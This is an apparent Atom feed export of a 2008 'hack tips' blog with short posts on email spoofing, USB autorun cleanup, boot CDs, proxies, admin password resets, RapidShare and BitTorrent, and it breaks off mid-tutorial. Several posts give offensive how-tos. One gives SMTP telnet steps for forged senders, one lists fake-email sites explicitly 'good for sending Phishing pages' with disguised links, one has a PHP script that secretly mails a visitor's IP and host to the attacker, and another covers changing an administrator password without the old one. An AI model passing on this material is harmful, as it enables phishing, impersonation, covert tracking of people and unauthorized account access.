type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/159376121208436046'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/159376121208436046'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/friendster-auto-friendadder.html' title='Friendster Auto FriendAdder!!'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-8326708544262194447</id><published>2008-12-30T05:00:00.000-08:00</published><updated>2009-01-03T04:45:32.826-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='anonymous'/><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>ANONYMOUS e-mails</title><content type='html'>Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog.&lt;br /&gt;&lt;br /&gt; I am Hackerdevil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take&lt;br /&gt;to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.&lt;br /&gt;&lt;br /&gt;This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)&lt;br /&gt;&lt;br /&gt;Well.....&lt;br /&gt;Go to Start, then Run...&lt;br /&gt;You have to Telnet (Xserver) on port 25&lt;br /&gt;&lt;br /&gt;Well, (In this Xserver) you have to put the name of a server without the ( ) of course...&lt;br /&gt;Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.&lt;br /&gt;(25) mail port.&lt;br /&gt;&lt;br /&gt;So now we are like this.&lt;br /&gt;&lt;br /&gt;telnet iname.com 25&lt;br /&gt;&lt;br /&gt;and then you hit enter&lt;br /&gt;Then When you have telnet open put the following like it is written&lt;br /&gt;&lt;br /&gt;helo&lt;br /&gt;&lt;br /&gt;and the machine will reply with smth.&lt;br /&gt;&lt;br /&gt;Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.&lt;br /&gt;Now you will se what you are writing.&lt;br /&gt;&lt;br /&gt;then you put:&lt;br /&gt;&lt;br /&gt;mail from:&lt;whoeveryouwant@whetheveryouwant.whetever.whatever&gt; and so on...&lt;br /&gt;If you make an error start all over again&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;mail from:&lt;askbill@microsoft.com.net&gt;&lt;br /&gt;&lt;br /&gt;You hit enter and then you put:&lt;br /&gt;&lt;br /&gt;rcpt to:(lamer@lamer'sworld.com) "Place that () to &lt;&gt;"!!&lt;br /&gt;This one has to be an existance address as you are mailing anonymously to him.&lt;br /&gt;&lt;br /&gt;Then you hit enter&lt;br /&gt;And you type&lt;br /&gt;Data&lt;br /&gt;and hit enter once more&lt;br /&gt;&lt;br /&gt;Then you write&lt;br /&gt;&lt;br /&gt;Subject:whetever&lt;br /&gt;&lt;br /&gt;And you hit enter&lt;br /&gt;&lt;br /&gt;you write your mail&lt;br /&gt;&lt;br /&gt;hit enter again (boring)&lt;br /&gt;&lt;br /&gt;you put a simple:&lt;br /&gt;.&lt;br /&gt;&lt;br /&gt;Yes you don't see it its the little fucking point!&lt;br /&gt;and hit enter&lt;br /&gt;Finally you write&lt;br /&gt;quit&lt;br /&gt;hit enter one more time&lt;br /&gt;and it's done&lt;br /&gt;&lt;br /&gt;look:Try first do it with yourself I mean mail annonymously yourself so you can test it!&lt;br /&gt;Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!&lt;br /&gt;&lt;br /&gt;Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....&lt;br /&gt;&lt;br /&gt;Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is  for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you.  If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com"  insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;By Hackerdevil&lt;br /&gt;&lt;br /&gt;hackerdevil@iname.com&lt;br /&gt;www.angelfire.com/ar/HDanzi/index.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-8326708544262194447?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/8326708544262194447/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/anonymous-e-mails.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8326708544262194447'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8326708544262194447'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/anonymous-e-mails.html' title='ANONYMOUS e-mails'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-2802886473501989625</id><published>2008-12-30T04:51:00.001-08:00</published><updated>2009-01-03T04:47:25.891-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='USB'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Remove "autorun.inf " from USB Drive!</title><content type='html'>"autorun.inf" is not able to use, edit or delete directly and "Cut/Copy/Paste" may not work. To view this file entries.&lt;br /&gt;1. Open the USB Drive.&lt;br /&gt;2. On the Folder address bar (path) type (if USB is E:) - "E:\autorun.inf"&lt;br /&gt;3. To replace this file - A simple procedure to remove/replace this "autorun.inf" is&lt;br /&gt;- Create a text file named "autorun.inf" on the desktop, open that file and type "open", save and exit.&lt;br /&gt;4. Now open the USB drive.&lt;br /&gt;5. Drag "autorun.inf" from desktop to USB drive (Do not Copy Past, Only Drag and Drop)&lt;br /&gt;6. Right Click "autorun.inf " , Go to "Security" Tab. Click 'Advanced' button. Use 'Edit' option to edit&lt;br /&gt;each lines in 'Permission Entries ' and set "Deny" permission to all entries. This setting will prevent viruses from reacting 'autorun.inf'&lt;br /&gt;&lt;br /&gt;i hope, it will help you...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-2802886473501989625?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/2802886473501989625/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/remove-autoruninf-from-usb-drive.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2802886473501989625'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2802886473501989625'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/remove-autoruninf-from-usb-drive.html' title='Remove &quot;autorun.inf &quot; from USB Drive!'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-7291207807543012207</id><published>2008-12-30T04:39:00.000-08:00</published><updated>2009-01-03T04:47:45.515-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bootable'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><title type='text'>How to make a boot CD by simple way</title><content type='html'>How to make a boot CD by simple way&lt;br /&gt;&lt;br /&gt;To make a boot CD, you’ll need  “PE Builder”. You can download it from&lt;br /&gt;             the website &lt;a href="http://www.nu2.nu/pebuilder"&gt;http://www.nu2.nu/pebuilder&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;You will need&lt;br /&gt;&lt;br /&gt;1.blank CD&lt;br /&gt;2.CD R/W drive&lt;br /&gt;3. OS CD eg.windows XP SP2&lt;br /&gt;4. PE builder software&lt;br /&gt;&lt;br /&gt;And then, simply do that steps,&lt;br /&gt;&lt;br /&gt;1. Open PE Builder&lt;br /&gt;&lt;br /&gt;2. Insert your OS CD in your CD drive.&lt;br /&gt;&lt;br /&gt;3. In PE Builder software,  press the source button and direct it to window CD path, eg. E:\&lt;br /&gt;&lt;br /&gt;4. In Media output tab, choose Burn to CD/DVD.&lt;br /&gt;&lt;br /&gt;5. Insert CD writer with blank CD.&lt;br /&gt;&lt;br /&gt;6.Press Build button!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-7291207807543012207?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/7291207807543012207/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/how-to-make-boot-cd-by-simple-way.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7291207807543012207'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7291207807543012207'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/how-to-make-boot-cd-by-simple-way.html' title='How to make a boot CD by simple way'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6845019237177877007</id><published>2008-12-30T04:26:00.000-08:00</published><updated>2009-01-03T04:46:55.845-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='anonymous'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Anonymous Online</title><content type='html'>Anonymous Online&lt;br /&gt;&lt;br /&gt;First of all, check your ip: &lt;a href="http://www.hide-my-ip.com/" target="_blank"&gt;hide-my-ip&lt;/a&gt;&lt;br /&gt;Now go get &lt;a href="https://addons.mozilla.org/fr/firefox/addon/2464" target="_blank"&gt;foxyproxy&lt;/a&gt;(I assume you have firefox). Download it.&lt;br /&gt;Restart firefox. They will ask you if you want to configure foxyproxy with tor. Say YES. Go through the configuration. Restart again. Go on &lt;a href="http://www.digitalcybersoft.com./ProxyList/fresh-proxy-list.shtml" target="_blank"&gt;PROXY LIST&lt;/a&gt; or your favorite proxy server. Open foxyproxy (tools/addons). Add a new proxy. Name it as yo uwant a complete the fields with the proxy you want. In whitelist, add google.com as a joker and click ok. Go on any website and look at the bottom of the window. It will be written foxyproxy: deactivated. Right click on it and choose use YOURPROXY for all URLs. Then go check yout IP again. If it doesn't work...try with another proxy.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6845019237177877007?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6845019237177877007/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/anonymous-online.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6845019237177877007'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6845019237177877007'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/anonymous-online.html' title='Anonymous Online'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-8033220189970216504</id><published>2008-12-30T04:14:00.000-08:00</published><updated>2009-01-03T04:51:41.644-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><category scheme='http://www.blogger.com/atom/ns#' term='Administrator'/><title type='text'>Hack Administrator</title><content type='html'>Hack Administrator&lt;br /&gt;&lt;br /&gt;Here we present the rock solid windows hacks&lt;br /&gt;for educational purpose only! read disclaimer before reading this article!&lt;br /&gt;&lt;br /&gt;_____&lt;br /&gt;&lt;br /&gt;Windows NT/2000/XP/Vista offline password editor:&lt;br /&gt;&lt;a href="http://home.eunet.no/%7Epnordahl/ntpasswd" target="_blank"&gt;http://home.eunet.no/~pnordahl/ntpasswd&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry's SAM file.&lt;br /&gt;You do not need to know the old password to set a new one.&lt;br /&gt;It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.&lt;br /&gt;Works with syskey (no need to turn it off, but you can if you have lost the key)&lt;br /&gt;Will detect and offer to unlock locked or disabled user accounts!&lt;br /&gt;Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again!&lt;br /&gt;Download links:&lt;br /&gt;cd070409.zip (~3MB) - Bootable CD image with newer drivers&lt;br /&gt;bd050303.zip (~1.1MB) - Bootdisk image, date 050303.&lt;br /&gt;sc050303.zip(~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)&lt;br /&gt;To write these images to a floppy disk you'll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;For Windows XP check out the attachment Below the comments!! It WORKS .AS IT CHANGES THE XP ADMIN PSWD WITHOUT U KNOWIN THE PREVIOUS ONE&lt;br /&gt;&lt;br /&gt;however the "net user" and&lt;br /&gt;&lt;br /&gt;"control userpasswords2" trick still works&lt;br /&gt;: Rahul&lt;br /&gt;&lt;br /&gt;You can change Administrator password from guest account without using any programs. It's easy:&lt;br /&gt;1. Start-&gt; Run, type lusrmgr.msc and hit Enter.&lt;br /&gt;2. You will see window with two folders:Users and Groups. Go in the Users folder, find the Administrator, right click-&gt; Set Password and now you can change the password without knowing the old one.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-8033220189970216504?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/8033220189970216504/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/hack-administrator.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8033220189970216504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8033220189970216504'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/hack-administrator.html' title='Hack Administrator'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-3104128783672620274</id><published>2008-12-30T04:02:00.000-08:00</published><updated>2009-01-03T04:51:19.409-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Sending Fake E-mails</title><content type='html'>&lt;span class="smalltext"&gt;&lt;strong&gt;Sending Fake E-mails &lt;/strong&gt;&lt;/span&gt;&lt;div class="post_body" id="pid_269429"&gt;Well, i see that there is much people asking for this, 'Where can i send fake emails?'.. 'How can i creat a fake e-mail?'. It is basic for some people but there is still someone asking for this.&lt;br /&gt;&lt;br /&gt;So, there you have:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.webwizny.com/sendemail.php" target="_blank"&gt;http://www.webwizny.com/sendemail.php&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.sendanonymousemail.net/" target="_blank"&gt;http://www.sendanonymousemail.net&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.deadfake.com/send.aspx" target="_blank"&gt;http://www.deadfake.com/send.aspx&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.note2emai.com/" target="_blank"&gt;http://www.note2emai.com&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.fuzzmail.org/" target="_blank"&gt;http://www.fuzzmail.org&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.gilc.org/speech/anonymous/remailer.html" target="_blank"&gt;http://www.gilc.org/speech/anonymous/remailer.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.anonymousmail.net-anonymity.info/" target="_blank"&gt;http://www.anonymousmail.net-anonymity.info&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There you can send e-mails without the people know that it is you. That is good for sending Phishing pages using:&lt;br /&gt;&lt;br /&gt;&lt;span style="FONT-WEIGHT: bold"&gt;[ url = &lt;a href="http://www.phish/FAKEPAGE.COM" target="_blank"&gt;http://www.PHISH/FAKEPAGE.COM&lt;/a&gt; ] Name you want your friend to see [ / url ]&lt;/span&gt;&lt;br /&gt;&lt;span style="FONT-STYLE: italic"&gt;(without spaces)&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-3104128783672620274?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/3104128783672620274/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/sending-fake-e-mails.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3104128783672620274'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3104128783672620274'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/sending-fake-e-mails.html' title='Sending Fake E-mails'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-8557202184833581552</id><published>2008-12-30T03:49:00.000-08:00</published><updated>2009-01-03T04:51:02.157-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='IP'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>PHP IP Stealer</title><content type='html'>&lt;span class="smalltext"&gt;&lt;strong&gt;Php IP Stealer &lt;/strong&gt;&lt;/span&gt;&lt;div class="post_body" id="pid_88519"&gt;This is so easy to do!!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PHP Code:&lt;br /&gt;&lt;br /&gt;$ip = $REMOTE_ADDR;&lt;br /&gt;$host = gethostbyaddr($ip);&lt;br /&gt;$date = date("d/m/Y H:i:s");&lt;br /&gt;$email = "youremail@here.com";&lt;br /&gt;$sujet = "Ip + Host";&lt;br /&gt;$message = "Moment : $date&lt;br /&gt;Ip : $ip&lt;br /&gt;Host : $host";&lt;br /&gt;if(mail($email,$sujet,$message,"Content-Type: text/html")){&lt;br /&gt;echo "This you have been OWNED!";}&lt;br /&gt;else { echo "Shit ?";}&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Change youremail@here.com with your email.&lt;br /&gt;Create a php document, give the link to someone and you'll receive his/her IP and host in your email box... &lt;/div&gt;&lt;div class="post_meta" id="post_meta_88519"&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;/tr&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-8557202184833581552?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/8557202184833581552/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/php-ip-stealer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8557202184833581552'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8557202184833581552'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/php-ip-stealer.html' title='PHP IP Stealer'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1301168773876624170</id><published>2008-12-30T03:43:00.000-08:00</published><updated>2009-01-03T04:54:19.195-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rapidshare'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>RapidShare Hack</title><content type='html'>RAPIDSHARE HACKED 100% WORKING&lt;br /&gt;GOTO &lt;a href="http://rs43.com/?" target="_blank"&gt;http://rs43.com/?&lt;/a&gt;click on the rapidshit!post the linkcopy the URL mirrorDownload HAVE FUN!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1301168773876624170?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1301168773876624170/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/rapidshare-hack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1301168773876624170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1301168773876624170'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/rapidshare-hack.html' title='RapidShare Hack'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-2983790234794717043</id><published>2008-12-30T03:22:00.000-08:00</published><updated>2009-01-03T04:55:04.047-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>XP Hidden Music</title><content type='html'>Hello Xp Users!!!..... this is a windows xp hidden musicgoto C:\Windows\system32\oobe\images.. there is a song named title.wma.. play it.. cool classic music.. have fun!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-2983790234794717043?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/2983790234794717043/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/xp-hidden-music.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2983790234794717043'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2983790234794717043'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/xp-hidden-music.html' title='XP Hidden Music'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6641010842942128132</id><published>2008-12-30T03:20:00.000-08:00</published><updated>2009-01-03T04:54:47.747-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='Torrent'/><title type='text'>Bit Torrent Tutorial</title><content type='html'>&lt;span class="smalltext"&gt;&lt;strong&gt;Bit Torrent Tutorials&lt;/strong&gt;&lt;/span&gt; &lt;div class="post_body" id="pid_88064"&gt;Bit Torrent Tutorials&lt;br /&gt;&lt;br /&gt;The first things you need to know about using Bit Torrent:&lt;br /&gt;-- Bit Torrent is aimed at broadband users (or any connection better than dialup).&lt;br /&gt;-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.&lt;br /&gt;-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)&lt;br /&gt;-- The method of downloading is not your conventional type of download. Since downloads do not come in as one&lt;br /&gt;big chunk, you are able to download from many people at once, increasing your download speeds. There may be&lt;br /&gt;100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)&lt;br /&gt;-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly&lt;br /&gt;share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).&lt;br /&gt;&lt;br /&gt;In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.&lt;br /&gt;&lt;br /&gt;Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).&lt;br /&gt;&lt;br /&gt;Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:&lt;br /&gt;&lt;br /&gt;Added  Name  Filesize  Seeds  DLs (and a few more which aren't very useful.)&lt;br /&gt;&lt;br /&gt;I'll break this down.&lt;br /&gt;Added: Self explanitory, its the date the torrent was added.&lt;br /&gt;Name: Also self explanitory.&lt;br /&gt;Filesize: Duh&lt;br /&gt;Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.&lt;br /&gt;DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.&lt;br /&gt;&lt;br /&gt;It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.&lt;br /&gt;&lt;br /&gt;Now that you should understand how torrent files work, and how to use them, on to Azureus!&lt;br /&gt;First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html&lt;br /&gt;Next, get Azureus at: /http://azureus.sourceforge.net&lt;br /&gt;Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar&lt;br /&gt;&lt;br /&gt;Install Java JRE before you do 